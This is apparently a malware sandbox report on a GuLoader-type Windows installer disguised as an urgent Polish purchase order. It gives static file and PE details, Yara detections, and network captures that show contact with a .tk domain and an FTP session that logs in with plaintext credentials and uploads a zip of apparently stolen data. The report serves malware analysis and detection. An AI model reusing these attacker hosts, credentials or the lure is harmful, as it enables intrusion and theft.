                                  Category:dropped
                                  Size (bytes):660
                                  Entropy (8bit):4.929915592008811
                                  Encrypted:false
                                  SSDEEP:12:t4CDqaZnoUJgiCydrkeYRAerAFFLAmLRHGdK5D9DME:t4C9ZoUJyyKbRAecFxfRHGMRtME
                                  MD5:96756F6658DD20BCB387DECC6C2FB720
                                  SHA1:42E06BBF711B5F71D07B965A0654AFF6249B99D6
                                  SHA-256:C15238E9B65995BDADC206340B33E7B7E50EF00031F5B61DF9700BBB5350F635
                                  SHA-512:F64F1B4C96611ADF276F87F242501534DA8D9D2A17A00749A4FE05DE051DA5CAEDF545D39D574BB7E6447CC272C5F9BF2E8B0EE88B277EDDB46D1E263C08FA1B
                                  Malicious:false
                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M8 4v11h3V4zm4-3v14h3V1zM4 7v8h3V7zm-4 3v5h3v-5z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal" overflow="visible" opacity=".35" color="#000" font-weight="400" font-family="sans-serif" fill="#474747" fill-rule="evenodd"/></svg>

                                  C:\Users\user\Pacifisterne\Automatcafeer\Tubulating\application-x-executable.png

                                  Download File
                                  Process:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):981
                                  Entropy (8bit):7.490445024712213
                                  Encrypted:false
                                  SSDEEP:24:Xtk15wEzJDA4IttcJtoyV+i2FgT17uiW1cWhncisE:XtkHj2t2HoyQxgJY/bsE
                                  MD5:57788EB5F2415CF88CDDF86A995B497F
                                  SHA1:CDF8E6B6E0F823C6A77EA66569B61BE5D760BF96
                                  SHA-256:08F67C366FB7F3371CA2E3B65DA0A4F9AEBD57D18A2990CB7571A8C2ECAD5D41
                                  SHA-512:024EF704154FC9D0DC38679F1C017691A69E5282E58297F018C40C5957C409B74CFE5F70ACB6BF35CDE8631265366F4E987DF80C1D2E57639253D1CE6FCD5B68
                                  Malicious:false
                                  Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....tEXtTitle.Adwaita Icon Template...?....tEXtAuthor.GNOME Design Team`.v~...RtEXtCopyright.CC Attribution-ShareAlike http://creativecommons.org/licenses/by-sa/4.0/.Tb.....IDAT8...KHTa....w_s.<n3..dY..ZH.hW.ET+.R.....,.ha.hQ...m-J..,.....0(j.0.Ef..L.c53w.w.|-"m|.Y......p....9..0....2.r.{...t..G- ..hU%oU.B26..R.(j../.k.>.....*.(.e..b[nNE#....Q..?......'...Nj.x..h.....!'..Zsu......0p7.....+&..Q.a.;A)..l(.QU^".O.7............m/c..D....@. H..V.P...Qy.uJ.]...S[..z).x..\..G...I6.tn"N.`.YP.PP....0..1...v....f..>N\.o..Z.....r..yw.. ..@.H..1W.....7.2fP0V..&..h.........T...9=.L:..D7...H..........`....39d...z*...[..........8...u.........X..1$..p6.G..`...}'.)..}'o.|.Ttb(-..xAD......D....T>.n..Nw..A...w...!-2....N.....U....Hhq.._$..i.~v.k.!.@b.oH....E&vj.).f.t...8^.{Sy=s1.{.._f./$G...5....x..........@...O[..........`.NB@e.o......t.....V..`U....IEND.B`.

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                  Entropy (8bit):6.874744026790643
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  File size:669600
                                  MD5:17388d36388d280c4e2d724c9ab58002
                                  SHA1:ee660100dfbad59a2796244514bff64c66cd0ca7
                                  SHA256:5f20a33e263b8b8f5388b8e2512d0678312257b8fdf592b8a83aa481076048ca
                                  SHA512:b49d055149f26ce72cd04ecd6fd581523fdeaf7f3234e8b547fa0fedbaf52aae6b408480c4cebdb7359422d9ae7664dcd8a083d99f13d9fbc1692d4914895ce4
                                  SSDEEP:12288:Pkvld8NVtfkug41IDHQ215k5P5x2/dKRy6i5y:PeHiMrQ2HkLI/ki5y
                                  TLSH:40E4F6527059808AE8A738F3685FC07014A02EAD92EDD25E66F67B2645F2313CC5FF9D
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

                                  File Icon

                                  Icon Hash:3319396623190917

                                  Static PE Info

                                  General

                                  Entrypoint:0x4030d9
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x5795638D [Mon Jul 25 00:55:41 2016 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                  Authenticode Signature

                                  Signature Valid:false
                                  Signature Issuer:CN=Dictatorialism, OU="Innervational Chloropal Stald ", E=Covalency@Bedrveligheds.Sl, O=Dictatorialism, L=Tarrant Rushton, S=England, C=GB
                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                  Error Number:-2146762487
                                  Not Before, Not After
                                  • 24/01/2023 08:31:02 23/01/2026 08:31:02
                                  Subject Chain
                                  • CN=Dictatorialism, OU="Innervational Chloropal Stald ", E=Covalency@Bedrveligheds.Sl, O=Dictatorialism, L=Tarrant Rushton, S=England, C=GB
                                  Version:3
                                  Thumbprint MD5:7F1F45BD7FCC95B4458C5EC8BFA17430
                                  Thumbprint SHA-1:31BE90317316BB6D5DBEDE711C3E03BCD2EF533A
                                  Thumbprint SHA-256:801CB0CF2041D9240AC71DE2FCEEC2FA0C23383EF6BEA436ECE5CCF3C1CB066D
                                  Serial:E5205A57DA732B09

                                  Entrypoint Preview

                                  Instruction
                                  sub esp, 00000184h
                                  push ebx
                                  push esi
                                  push edi
                                  xor ebx, ebx
                                  push 00008001h
                                  mov dword ptr [esp+18h], ebx
                                  mov dword ptr [esp+10h], 00409198h
                                  mov dword ptr [esp+20h], ebx
                                  mov byte ptr [esp+14h], 00000020h
                                  call dword ptr [004070A8h]
                                  call dword ptr [004070A4h]
                                  cmp ax, 00000006h
                                  je 00007FD0F0574393h
                                  push ebx
                                  call 00007FD0F0577301h
                                  cmp eax, ebx
                                  je 00007FD0F0574389h
                                  push 00000C00h
                                  call eax
                                  mov esi, 00407298h
                                  push esi
                                  call 00007FD0F057727Dh
                                  push esi
                                  call dword ptr [004070A0h]
                                  lea esi, dword ptr [esi+eax+01h]
                                  cmp byte ptr [esi], bl
                                  jne 00007FD0F057436Dh
                                  push ebp
                                  push 00000009h
                                  call 00007FD0F05772D4h
                                  push 00000007h
                                  call 00007FD0F05772CDh
                                  mov dword ptr [00423704h], eax
                                  call dword ptr [00407044h]
                                  push ebx
                                  call dword ptr [00407288h]
                                  mov dword ptr [004237B8h], eax
                                  push ebx
                                  lea eax, dword ptr [esp+38h]
                                  push 00000160h
                                  push eax
                                  push ebx
                                  push 0041ECC8h
                                  call dword ptr [00407174h]
                                  push 00409188h
                                  push 00422F00h
                                  call 00007FD0F0576EF7h
                                  call dword ptr [0040709Ch]
                                  mov ebp, 00429000h
                                  push eax
                                  push ebp
                                  call 00007FD0F0576EE5h
                                  push ebx
                                  call dword ptr [00407154h]

                                  Rich Headers

                                  Programming Language:
                                  • [EXP] VC++ 6.0 SP5 build 8804

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e0000x5aec8.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xa30780x728
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x5c5b0x5e00False0.6603640292553191data6.411456379497882IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x70000x12460x1400False0.42734375data5.005029341587408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x90000x1a7f80x400False0.6376953125data5.108396988130901IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .ndata0x240000x1a0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x3e0000x5aec80x5b000False0.23903245192307693data5.402063687419607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_ICON0x3e2b00x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States
                                  RT_ICON0x802d80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States
                                  RT_ICON0x90b000x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States
                                  RT_ICON0x94d280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                  RT_ICON0x972d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                  RT_ICON0x983780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                  RT_DIALOG0x987e00x100dataEnglishUnited States
                                  RT_DIALOG0x988e00x11cdataEnglishUnited States
                                  RT_DIALOG0x98a000xc4dataEnglishUnited States
                                  RT_DIALOG0x98ac80x60dataEnglishUnited States
                                  RT_GROUP_ICON0x98b280x5adataEnglishUnited States
                                  RT_MANIFEST0x98b880x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States

                                  Imports

                                  DLLImport
                                  KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                  USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                  ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.11.201.1.1.162662532012811 01/25/23-10:05:53.440564UDP2012811ET DNS Query to a .tk domain - Likely Hostile6266253192.168.11.201.1.1.1

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 25, 2023 10:05:53.488614082 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.488699913 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.488890886 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.512908936 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.512933016 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.603182077 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.603401899 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.603403091 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.668005943 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.668132067 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.669401884 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.669529915 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.672966003 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.703051090 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.703202009 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.703241110 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.703285933 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.703427076 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.703427076 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.703615904 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.703670025 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.703811884 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.730830908 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.731036901 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.731096029 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.731388092 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.731636047 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.732014894 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.732270002 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.758853912 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.759023905 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.759076118 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.759320021 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.759550095 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.759677887 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.760009050 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.760193110 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.760359049 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.760612965 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.760756016 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.760756969 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.760803938 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.760978937 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.761365891 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.761513948 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.761663914 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.761987925 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.762150049 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.762339115 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.786912918 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.787070036 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.787070036 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.787122011 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.787266016 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.787298918 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.787324905 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.787400961 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.787627935 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.787872076 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.788034916 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.788208008 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.788492918 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.788688898 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.788688898 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.788688898 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.788923979 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.789186954 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.789427996 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.789825916 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.790074110 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.790489912 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.790689945 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.790795088 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.791296005 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.791497946 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.791498899 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.791498899 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.791498899 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.791548967 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.791804075 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.791992903 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.791992903 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.792074919 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.792359114 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.792556047 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.793034077 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.793232918 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.793303967 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.793375969 CET44349854103.83.194.19192.168.11.20
                                  Jan 25, 2023 10:05:53.793502092 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.793502092 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.793682098 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.793682098 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:53.793682098 CET49854443192.168.11.20103.83.194.19
                                  Jan 25, 2023 10:05:55.709336042 CET49855443192.168.11.2064.185.227.155
                                  Jan 25, 2023 10:05:55.709491968 CET4434985564.185.227.155192.168.11.20
                                  Jan 25, 2023 10:05:55.709748030 CET49855443192.168.11.2064.185.227.155
                                  Jan 25, 2023 10:05:55.712908030 CET49855443192.168.11.2064.185.227.155
                                  Jan 25, 2023 10:05:55.712990046 CET4434985564.185.227.155192.168.11.20
                                  Jan 25, 2023 10:05:56.024872065 CET4434985564.185.227.155192.168.11.20

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 25, 2023 10:05:53.440563917 CET6266253192.168.11.201.1.1.1
                                  Jan 25, 2023 10:05:53.481072903 CET53626621.1.1.1192.168.11.20
                                  Jan 25, 2023 10:05:55.694389105 CET6415753192.168.11.201.1.1.1
                                  Jan 25, 2023 10:05:55.703833103 CET53641571.1.1.1192.168.11.20
                                  Jan 25, 2023 10:05:59.343787909 CET6310853192.168.11.201.1.1.1
                                  Jan 25, 2023 10:05:59.859232903 CET53631081.1.1.1192.168.11.20

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 25, 2023 10:05:53.440563917 CET192.168.11.201.1.1.10x5825Standard query (0)enlluec.tkA (IP address)IN (0x0001)false
                                  Jan 25, 2023 10:05:55.694389105 CET192.168.11.201.1.1.10x3f7bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                  Jan 25, 2023 10:05:59.343787909 CET192.168.11.201.1.1.10x29e5Standard query (0)ftp.sentientshift.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jan 25, 2023 10:05:53.481072903 CET1.1.1.1192.168.11.200x5825No error (0)enlluec.tk103.83.194.19A (IP address)IN (0x0001)false
                                  Jan 25, 2023 10:05:55.703833103 CET1.1.1.1192.168.11.200x3f7bNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                  Jan 25, 2023 10:05:55.703833103 CET1.1.1.1192.168.11.200x3f7bNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                  Jan 25, 2023 10:05:55.703833103 CET1.1.1.1192.168.11.200x3f7bNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                  Jan 25, 2023 10:05:55.703833103 CET1.1.1.1192.168.11.200x3f7bNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                  Jan 25, 2023 10:05:59.859232903 CET1.1.1.1192.168.11.200x29e5No error (0)ftp.sentientshift.comsentientshift.comCNAME (Canonical name)IN (0x0001)false
                                  Jan 25, 2023 10:05:59.859232903 CET1.1.1.1192.168.11.200x29e5No error (0)sentientshift.com192.185.87.146A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • enlluec.tk
                                  • api.ipify.org

                                  FTP Packets

                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  Jan 25, 2023 10:06:00.092856884 CET2149856192.185.87.146192.168.11.20220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:06. Server port: 21.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:06. Server port: 21.220-IPv6 connections are also welcome on this server.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:06. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                  Jan 25, 2023 10:06:00.095689058 CET4985621192.168.11.20192.185.87.146USER senti@sentientshift.com
                                  Jan 25, 2023 10:06:00.209908962 CET2149856192.185.87.146192.168.11.20331 User senti@sentientshift.com OK. Password required
                                  Jan 25, 2023 10:06:00.210305929 CET4985621192.168.11.20192.185.87.146PASS @sentientshift.com
                                  Jan 25, 2023 10:06:02.374598980 CET2149856192.185.87.146192.168.11.20230 OK. Current restricted directory is /
                                  Jan 25, 2023 10:06:02.489878893 CET2149856192.185.87.146192.168.11.20504 Unknown command
                                  Jan 25, 2023 10:06:02.490302086 CET4985621192.168.11.20192.185.87.146PWD
                                  Jan 25, 2023 10:06:02.605287075 CET2149856192.185.87.146192.168.11.20257 "/" is your current location
                                  Jan 25, 2023 10:06:02.605855942 CET4985621192.168.11.20192.185.87.146TYPE I
                                  Jan 25, 2023 10:06:02.720877886 CET2149856192.185.87.146192.168.11.20200 TYPE is now 8-bit binary
                                  Jan 25, 2023 10:06:02.721354008 CET4985621192.168.11.20192.185.87.146PASV
                                  Jan 25, 2023 10:06:02.836556911 CET2149856192.185.87.146192.168.11.20227 Entering Passive Mode (192,185,87,146,155,26)
                                  Jan 25, 2023 10:06:02.952943087 CET4985621192.168.11.20192.185.87.146STOR CO_user-305090_2023_01_25_10_05_58.zip
                                  Jan 25, 2023 10:06:03.068484068 CET2149856192.185.87.146192.168.11.20150 Accepted data connection
                                  Jan 25, 2023 10:06:03.300081968 CET2149856192.185.87.146192.168.11.20226-File successfully transferred
                                  226-File successfully transferred226 0.232 seconds (measured here), 103.72 Kbytes per second

                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:1
                                  Start time:10:03:56
                                  Start date:25/01/2023
                                  Path:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  Imagebase:0x400000
                                  File size:669600 bytes
                                  MD5 hash:17388D36388D280C4E2D724C9AB58002
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000001.00000002.14099095140.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.14100531174.00000000058D8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low

                                  General

                                  Target ID:3
